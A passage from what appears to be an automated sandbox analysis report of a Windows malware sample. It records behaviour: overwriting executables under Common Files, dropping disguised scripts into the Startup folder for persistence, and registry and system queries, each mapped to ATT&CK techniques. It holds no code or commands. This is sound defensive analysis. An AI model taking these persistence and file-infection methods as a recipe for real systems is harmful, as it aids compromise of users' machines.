\"C:\\Program Files\\Common Files\\Adobe AIR\\Versions\\1.0\\Resources\\template.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Program Files\\Common Files\\Java\\Java Update\\jaureg.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Program Files\\Common Files\\Java\\Java Update\\jucheck.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Program Files\\Common Files\\Java\\Java Update\\jusched.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\DW\\DW20.EXE\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\DW\\DWTRIG20.EXE\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\EQUATION\\EQNEDT32.EXE\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\ConvertInkStore.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickLearningWizard.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkWatson.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\InputPersonalization.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\pipanel.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\ShapeCollector.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\OFFICE14\\FLTLDR.EXE\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\OFFICE14\\LICLUA.EXE\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\OFFICE14\\MSOICONS.EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" writes file \"c:\\program files\\common files\\adobe\\arm\\1.0\\adobearm.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" writes file \"c:\\program files\\common files\\adobe\\arm\\1.0\\adobearmhelper.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" writes file \"c:\\program files\\common files\\adobe\\arm\\1.0\\armsvc.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" writes file \"c:\\program files\\common files\\adobe air\\versions\\1.0\\adobe air application installer.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" writes file \"c:\\program files\\common files\\adobe air\\versions\\1.0\\resources\\adobe air updater.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" writes file \"c:\\program files\\common files\\adobe air\\versions\\1.0\\resources\\airappinstaller.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" writes file \"c:\\program files\\common files\\adobe air\\versions\\1.0\\resources\\template.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" writes file \"c:\\program files\\common files\\java\\java update\\jaureg.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" writes file \"c:\\program files\\common files\\java\\java update\\jucheck.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" writes file \"c:\\program files\\common files\\java\\java update\\jusched.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\office14\\fltldr.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\office14\\liclua.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\office14\\msoicons.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\office14\\msoxmled.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\office14\\oarpmany.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\odeploy.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\ospprearm.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\smart tag\\smarttaginstall.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\textconv\\wksconv\\wkconv.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\vsta\\8.0\\x86\\vsta_ep32.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-17", "type": 6, "relevance": 10, "name": "Scans for the windows taskbar (may be used for explorer injection)", "description": "\"iexplore.exe\" searching for class \"Shell_TrayWnd\"", "origin": "API Call", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"INSTALLROOT\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"CLRLOADLOGDIR\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"USELEGACYV2RUNTIMEACTIVATIONPOLICYDEFAULTVALUE\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"ONLYUSELATESTCLR\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\"; Key: \"NOCLIENTCHECKS\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\NET FRAMEWORK SETUP\\NDP\\V4\\FULL\"; Key: \"RELEASE\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"11762E9E3553DD6AD102461E573F1E35E0FEE399224BBE3567575FE26C3C7AB4\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"DISABLECONFIGCACHE\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\WMI\\SECURITY\"; Key: \"E13C0D23-CCBC-4E12-931B-D9CC2EEE27E4\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\WMI\\SECURITY\"; Key: \"763FD754-7086-4DFE-95EB-C01A46FAF4CA\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\WMI\\SECURITY\"; Key: \"A669021C-C450-4609-A035-5AF59AF4DF18\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\WMI\\SECURITY\"; Key: \"CC2BCBBA-16B6-4CF3-8990-D74C2E8AF500\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\"; Key: \"CACHELOCATION\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\"; Key: \"DOWNLOADCACHEQUOTAINKB\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\"; Key: \"ENABLELOG\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-2", "type": 6, "relevance": 8, "name": "Creates new processes", "description": "\"iexplore.exe\" is creating a new process (Name: \"C:\\Program Files\\Internet Explorer\\iexplore.exe\")", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"xlsrvintl.dll\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%COMMONPROGRAMFILES%\\microsoft shared\\OFFICE14\\1033\\xlsrvintl.dll]- [targetUID: 00000000-00005932]\n \"Antivirus.bat\" has type \"DOS batch file ASCII text with very long lines (844) with CRLF line terminators\"- Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus.bat]- [targetUID: 00000000-00005932]\n \"YourMom.vbs\" has type \"ASCII text\"- Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMom.vbs]- [targetUID: 00000000-00005932]\n \"Antivirus3.vbs\" has type \"C source ASCII text\"- Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus3.vbs]- [targetUID: 00000000-00005932]\n \"KasperskyScanner.hta\" has type \"HTML document ASCII text with CRLF line terminators\"- Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\KasperskyScanner.hta]- [targetUID: 00000000-00005932]\n \"Antivirus2.vbs\" has type \"ISO-8859 text with CRLF line terminators\"- Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus2.vbs]- [targetUID: 00000000-00005932]\n \"dism.log\" has type \"Unicode text UTF-8 (with BOM) text with very long lines (312) with CRLF line terminators\"- [targetUID: N/A]\n \"DISMHOST.EXE.67AB4062.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"RecoveryStore._85558835-E86A-11EF-98CC-00505691CC82_.dat\" has type \"Composite Document File V2 Document Cannot read section info\"- [targetUID: N/A]\n \"YourMomIsGay.html.bin\" has type \"HTML document ISO-8859 text with CRLF line terminators\"- [targetUID: N/A]\n \"_85558837-E86A-11EF-98CC-00505691CC82_.dat\" has type \"Composite Document File V2 Document Cannot read section info\"- [targetUID: N/A]\n \"services\" has type \"ASCII text with no line terminators\"- Location: [%WINDIR%\\System32\\drivers\\etc\\services]- [targetUID: 00000000-00005932]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-2.dll\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-0.dll\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\VCRUNTIME140_CLR0400.dll\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ucrtbase_clr0400.dll\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-quirks-l1-1-0.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" reads file \"c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll.aux\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\system.windows.forms.ni.dll.aux\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\0b2f69b43a576b9edcc807a30872bd91\\system.ni.dll.aux\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll.aux\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\system.drawing.ni.dll.aux\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" reads file \"c:\\11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\96f7edb07b12303f0ec2595c7f3778c7\\system.configuration.ni.dll.aux\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll.aux\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll.aux\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\POLICY\\\"; Key: \"\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\POLICY\\V4.0\"; Key: \"\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\POLICY\\STANDARDS\"; Key: \"\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\POLICY\\STANDARDS\\V4.0.30319\"; Key: \"\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" queries volume information of \"C:\\11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" at 00000000-00005932-0000010C-4159150", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"RtlGetVersion\" with parameter 